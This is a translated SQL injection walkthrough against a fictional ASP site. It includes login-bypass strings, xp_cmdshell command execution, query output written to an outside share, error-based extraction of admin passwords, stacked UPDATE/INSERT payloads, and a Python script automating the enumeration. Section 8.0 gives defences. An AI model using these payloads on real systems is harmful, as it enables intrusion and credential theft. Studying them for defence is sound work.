SQL Injection Walkthrough

xiaoxiao2021-03-06  64

Original: SK@scan-associates.net

Source: http://www.securiteam.com/

Translator: Demonalex

Translator Email: Demonalex_at_dark2s.org

Published at: http://demonalex.cn.st / http://www.cnwill.com

Summary: The following is meant to help both people who want to master this vulnerability and people who want to know how to defend against it understand how SQL injection actually works.

Details:

1.0 Introduction

When a machine exposes only port 80 (that is, it offers nothing but HTTP), a port scan will not give you much valuable vulnerability information, and if the administrator keeps the server patched, you have to turn your attention to the web application itself. SQL injection is one kind of web attack. It has no special requirements: the target only needs to serve ordinary HTTP, and it does not matter whether the administrator is "patch mad". Attacks of this kind target the web handlers themselves (ASP, JSP, PHP, CGI, and so on).

This article does not introduce any new tricks; SQL injection attacks are already widely known. I am writing it to record some experiences from my recent experiments, in the hope that they give readers a useful reference. You can also find more SQL injection techniques written by others in section 9.0, "Where can I get more related information?".

1.1 What is SQL injection?

This attack embeds SQL query or command fragments into an otherwise legitimate HTTP request in order to carry out the attacker's intent. Many dynamic web pages take parameters from the request and use them to build an SQL query to the database. For example, when a user logs in, the page sends the submitted username and password to the database in an SQL query to check whether the credentials are valid. From the attacker's point of view, modifying the username and/or password value changes the SQL the page sends, and that is what the attack exploits.

1.2 What do you need for SQL injection (tools, etc.)?

A web browser (or any other HTTP client).

2.0 What do you need to look for?

First find a page that accepts submitted data: a login page, a search page, a feedback form, and so on. Some HTML pages pass their parameters to another ASP page with the POST method, so you will not always see the parameters in the URL. Even then, you can tell that parameters are being passed by looking for the <FORM> tag in the HTML source. Every parameter passed between <FORM> and </FORM> (the <input> fields, hidden ones included) is a candidate for SQL injection.

2.1 What should you do when you cannot find a page with input fields?

Look for ASP, JSP, CGI, or PHP pages and try to find URLs that carry parameters, such as:

http://duck/index.asp?id=10

3.0 How do you test for the flaw?

Start by inserting some special characters. On a login page, enter something like the following into the login and/or password fields, or put it into the URL:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you need to do this against a hidden field, save the HTML page from the site to your local disk, modify the hidden field's value (for example to hi' or 1=1--), and submit the form from the local copy. If you are lucky, you will now be "logged in" without any account or password.

3.1 Why ' or 1=1--?

Let's look at why ' or 1=1-- matters with a different example. Beyond bypassing a login, this style of input can expose data that a normal request would never return. Take an ASP page reached through the link:

http://duck/index.asp?category=food

In this URL, 'category' is the variable name and 'food' is the value given to it. For that link to work, the ASP page must contain code along these lines (this is also the code used in this experiment):

    v_cat = request("category")
    sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs = conn.execute(sqlstr)

As you can see, the value is taken from the request, assigned to v_cat, and glued into the SQL statement, which becomes:

    SELECT * FROM product WHERE PCategory='food'

This query returns the rows that satisfy the WHERE condition, in this case every product whose PCategory is 'food'. Now change the URL to:

http://duck/index.asp?category=food' or 1=1--

The value of v_cat is now "food' or 1=1--", so the SQL statement becomes:

    SELECT * FROM product WHERE PCategory='food' or 1=1--'

This query selects every row of the product table regardless of whether PCategory equals 'food'. The two dashes (--) at the end start an SQL comment in MS SQL Server, so the server ignores everything after them, including the trailing single quote that the page appended. On MySQL you can use '#' instead of '--' for the same purpose. If the backend is not MS SQL Server, or you cannot comment out the trailing quote so easily, try ' or 'a'='a instead. The statement then becomes:

    SELECT * FROM product WHERE PCategory='food' or 'a'='a'

which returns the same result.

Depending on the situation, the injected string can take several forms:

    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a
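The concatenation shown above, reproduced as a runnable Python/sqlite script. This is an added example, not code from the original article: it builds the same concatenated query for the product lookup and for a login check, feeds it the payloads from sections 3.0 and 3.1, and contrasts it with the parameterized form that section 8.0 calls for. The table contents are constructed, and sqlite stands in for MS SQL Server because both treat -- as a comment marker.

```python
import sqlite3


def make_product_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the article's product and admin_login tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product(id INTEGER, name TEXT, pcategory TEXT);
        INSERT INTO product VALUES (1, 'apple', 'food'), (2, 'bread', 'food'), (3, 'hammer', 'tools');
        CREATE TABLE admin_login(login_name TEXT, password TEXT);
        INSERT INTO admin_login VALUES ('neo', 'm4trix');
    """)
    return db


def products_vulnerable(db, v_cat):
    # Same construction as the ASP page: the request value is glued into the SQL text,
    # so a quote inside it closes the literal and the rest is parsed as SQL.
    sqlstr = "SELECT * FROM product WHERE pcategory='" + v_cat + "'"
    return db.execute(sqlstr).fetchall()


def login_vulnerable(db, login, password):
    # Typical authentication query built by concatenation: any row back means "logged in".
    sqlstr = ("SELECT * FROM admin_login WHERE login_name='" + login
              + "' AND password='" + password + "'")
    return len(db.execute(sqlstr).fetchall()) > 0


def products_safe(db, v_cat):
    # Parameterized query: the driver passes the value separately from the SQL text,
    # so quotes and comment markers inside it are compared as data, never parsed as SQL.
    return db.execute("SELECT * FROM product WHERE pcategory=?", (v_cat,)).fetchall()


def login_safe(db, login, password):
    rows = db.execute("SELECT * FROM admin_login WHERE login_name=? AND password=?",
                      (login, password)).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    db = make_product_db()
    print(products_vulnerable(db, "food"))                    # the two food rows
    print(products_vulnerable(db, "food' or 1=1--"))          # every row: WHERE is always true
    print(products_vulnerable(db, "food' or 'a'='a"))         # every row, no comment needed
    print(login_vulnerable(db, "hi' or 1=1--", "whatever"))   # True: logged in without a password
    print(products_safe(db, "food' or 1=1--"))                # []: no category has that literal name
    print(login_safe(db, "hi' or 1=1--", "whatever"))         # False
```

Run it as a script to see the effect of each payload; the safe variants return nothing for the injected strings because the whole string, quotes and dashes included, is compared against the column value.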

4.0 How do I get a command executed immediately through the SQL injection?

Servers that are vulnerable to SQL injection are usually also carelessly configured in other respects, so it is worth trying to execute commands through the injected SQL. Older MS SQL Server installations run by default under the SYSTEM account, so anything the server executes runs with operating-system administrator privileges. We can use MS SQL Server's extended stored procedures (such as master..xp_cmdshell) to run commands on the remote system:

    '; exec master..xp_cmdshell 'ping 10.10.1.2'--

If that fails, try " (double quote) in place of ' (single quote). The semicolon in the example ends the current SQL statement, and what follows it is executed as a new statement. To verify that the ping ran, listen for ICMP echo requests on 10.10.1.2 and confirm that they come from the SQL server:

    #tcpdump icmp

If you receive no ping from the SQL server and the request comes back with an error message, the SQL server administrator has probably restricted the web user's access to these stored procedures.

5.0 How can I get the output of the SQL I sent?

We can use the sp_makewebtask procedure to write the result of a query to a file on a network share:

    '; exec master..sp_makewebtask "\\10.10.1.3\share\output.html", "select * from information_schema.tables"--

The prerequisite is that the host 10.10.1.3 has a folder called "share" shared with write access for Everyone, so that the SQL server can write the file there.

6.0 How can I get important data out of the ODBC error messages the database returns?

We can make MS SQL Server leak information (table names, column names, and so on) through its error messages. Take the URL:

http://duck/index.asp?id=10

We can append a UNION clause after the integer 10, for example:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system view INFORMATION_SCHEMA.TABLES lists every table in the database, and its TABLE_NAME column holds each table's name. We choose this view because we know it must exist. Our injected query is:

    SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

which returns the first table name in the database. But because the UNION joins this result onto the integer column that holds 10, MS SQL Server tries to convert the returned string into an integer. A string (nvarchar) cannot be converted to an integer (int), so the conversion raises an error and the server shows:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
    /index.asp, line 5

Very good: the error message tells us exactly what we wanted to know, in this case that the first table is called 'table1'. To get the next table name, send:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also search for interesting names with LIKE (%25 is the URL encoding of the % wildcard):

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
    /index.asp, line 5

6.1 How do I find the column names in a table?

Use another important view, INFORMATION_SCHEMA.COLUMNS, which lists every column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
    /index.asp, line 5

Now that we have the first column name, we get the next one by excluding it:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
    /index.asp, line 5

Repeating this yields the remaining column names, 'password' and 'details'. When we send the request excluding all four known columns:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

the injected query no longer returns a row, and the page produces a different error instead:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
    /index.asp, line 5

The disappearance of the conversion error tells us there are no columns left to enumerate.

6.2 How do I find the data we need?

Now that we have identified the important tables and columns, we use the same trick to pull the data itself. Let's ask for the first username in the admin_login table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
    /index.asp, line 5

So one administrator account is 'neo'. Finally, its password:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='neo'--

Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
    /index.asp, line 5

Now we can log in to the system as 'neo' with the password 'm4trix'.

6.3 How do I get numeric string values?

The technique above has one limitation: when the data consists only of digits (0-9), it converts to an integer cleanly and we never get the error we need. For example, suppose we try to get the password of the user 'trinity', which is '31173':

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='trinity'--

We will probably just get a normal page or a "Page Not Found" style response. The problem is that the string '31173' is converted to the integer 31173 when it is unioned with the integer column (the one holding 10). The UNION is then perfectly legal, SQL Server returns no ODBC error, and the digits never leak. To fix this, we append some letters to the data so that the conversion must fail. Try the following request instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 CONVERT(int, password%2b'%20morpheus') FROM admin_login WHERE login_name='trinity'--

Here we used the string concatenation operator + (URL-encoded as %2b, which is 0x2b in ASCII) to append a space (%20) and the word 'morpheus' to the actual password. Even when the stored value is the digit string '31173', the expression becomes '31173 morpheus'. CONVERT() then tries to turn '31173 morpheus' into an integer, and SQL Server returns:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
    /index.asp, line 5

Now we know that trinity's password is '31173'.
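The error-based enumeration of sections 6.0 to 6.3, automated in Python. This is an added example, not the article's own code. A constructed sqlite database stands in for the duck server: a second in-memory database is attached under the name information_schema so the same INFORMATION_SCHEMA view names work, a closure plays index.asp with the same concatenation, and the int-conversion failure that SQL Server raises on UNION rows is emulated explicitly, including the all-digit case that converts silently. The client side is the real part: it parses the leaked value out of the ODBC message, grows the NOT IN list until nothing new leaks, and falls back to the concatenation trick of 6.3 when a value is all digits. The dialect differences are that TOP 1 becomes LIMIT 1 inside a subquery and + becomes ||; table names and contents are invented.

```python
import re
import sqlite3

# Shape of the message SQL Server returns when a UNION row cannot be converted to int.
ODBC_ERROR = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
              "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
              "the nvarchar value '{value}' to a column of data type int.\n/index.asp, line 5")
LEAK_RE = re.compile(r"converting the nvarchar value '(.*)' to a column of data type int")
SUFFIX = " morpheus"   # letters appended so all-digit values fail the int conversion (6.3)


def make_target():
    """Constructed stand-in for the duck server: sqlite plays MS SQL Server and the
    returned closure plays index.asp. Tables and their contents are invented."""
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS information_schema")
    db.executescript("""
        CREATE TABLE product(id INTEGER, name TEXT);
        INSERT INTO product VALUES (10, 'apple');
        CREATE TABLE admin_login(login_id INTEGER, login_name TEXT, password TEXT, details TEXT);
        INSERT INTO admin_login VALUES (1, 'neo', 'm4trix', 'NA'), (2, 'trinity', '31173', 'NA');
        CREATE TABLE information_schema.tables(table_name TEXT);
        INSERT INTO information_schema.tables VALUES ('product'), ('admin_login');
        CREATE TABLE information_schema.columns(table_name TEXT, column_name TEXT);
        INSERT INTO information_schema.columns VALUES ('admin_login', 'login_id'),
            ('admin_login', 'login_name'), ('admin_login', 'password'), ('admin_login', 'details');
    """)

    def index_asp(id_param: str) -> str:
        sql = "SELECT id FROM product WHERE id = " + id_param   # the vulnerable concatenation
        try:
            rows = db.execute(sql).fetchall()
        except sqlite3.Error:
            return "<html>Page Not Found</html>"
        # The UNION's result column is int (from product.id). SQL Server converts every row
        # to int and fails on the first non-numeric string; emulate exactly that behaviour.
        for (value,) in rows:
            if isinstance(value, str) and not value.strip().isdigit():
                return ODBC_ERROR.format(value=value)
        return "<html>product page</html>"

    return index_asp


def leak(page_html: str):
    """Pull the leaked value out of the conversion error, or None if nothing leaked."""
    m = LEAK_RE.search(page_html)
    return m.group(1) if m else None


def leak_one(page, column, source, where=""):
    """Extract one value of `column` from `source` through the int-conversion error."""
    cond = f" WHERE {where}" if where else ""
    value = leak(page(f"10 UNION SELECT * FROM (SELECT {column} FROM {source}{cond} LIMIT 1)--"))
    if value is None:
        # Section 6.3: an all-digit value converts cleanly and never errors, so append letters
        # (|| is sqlite's concatenation; the article uses + with CONVERT on SQL Server).
        value = leak(page(f"10 UNION SELECT * FROM (SELECT {column} || '{SUFFIX}' "
                          f"FROM {source}{cond} LIMIT 1)--"))
        if value is not None:
            value = value[:-len(SUFFIX)]
    return value


def enumerate_values(page, column, source, where=""):
    """Sections 6.0-6.2: keep excluding known values with NOT IN until nothing new leaks."""
    found = []
    while True:
        cond = where
        if found:
            excluded = ", ".join(f"'{v}'" for v in found)
            cond = (f"{cond} AND " if cond else "") + f"{column} NOT IN ({excluded})"
        value = leak_one(page, column, source, cond)
        if value is None or value in found:
            return found
        found.append(value)


if __name__ == "__main__":
    page = make_target()
    tables = enumerate_values(page, "table_name", "information_schema.tables")
    cols = enumerate_values(page, "column_name", "information_schema.columns",
                            "table_name = 'admin_login'")
    users = enumerate_values(page, "login_name", "admin_login")
    print(tables, cols, users)
    for user in users:
        print(user, leak_one(page, "password", "admin_login", f"login_name = '{user}'"))
```

The same enumerate_values loop also recovers purely numeric columns such as login_id, because leak_one retries with the letter suffix whenever the plain request comes back without an error; against a real MS SQL Server only the page callable and the two dialect substitutions would change.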

7.0 How do I UPDATE or INSERT data in the database?

Once we have collected all the column names of a table, we can UPDATE existing rows or INSERT new ones. For example, to change neo's password:

http://duck/index.asp?id=10; UPDATE admin_login SET password='newpas5' WHERE login_name='neo'--

To add a new record:

http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--

Now we can log in as 'neo2' with the password 'newpas5'. Stacked statements like these depend on the database driver accepting more than one statement in a single request, which MS SQL Server does.

8.0 How do I avoid being hit by SQL injection?

Filter special characters such as the single quote, double quote, slash, backslash, semicolon, and NUL character, and apply the filtering to every source of input: user-supplied form fields, parameters in the requested URL, and data read from cookies. For numeric values, convert the value to an integer before placing it in the SQL statement, or check it with IsNumeric(). Run the SQL Server service under a low-privilege account instead of SYSTEM ("Startup and run SQL Server" in the server's security settings). Remove the stored procedures you do not need, such as master..xp_cmdshell, xp_startmail, xp_sendmail, and sp_makewebtask. The most robust defence, which makes character filtering unnecessary, is never to concatenate user input into SQL text at all and to use parameterized queries instead.

9.0 Where can I get more related information?

We first came across SQL injection in Rain Forest Puppy's article about how he broke into PacketStorm:
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

A good article on harvesting data through ODBC error messages:
http://www.blackhat.com/presentation/win-...1LITCHFIELD.DOC

SQL injection against SQL Server:
http://www.owasp.org/asac/input_validation/sql.shtml

Sensepost's article on SQL injection:
http://www.sensepost.com/misc/sqlinsertion.htm

Other related documents:
http://www.digitaloffense.net/wargames01/iowargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/whi...qlinjection.pdf

--------------------


Please credit the original source when reposting: https://www.9cbs.com/read-86031.html
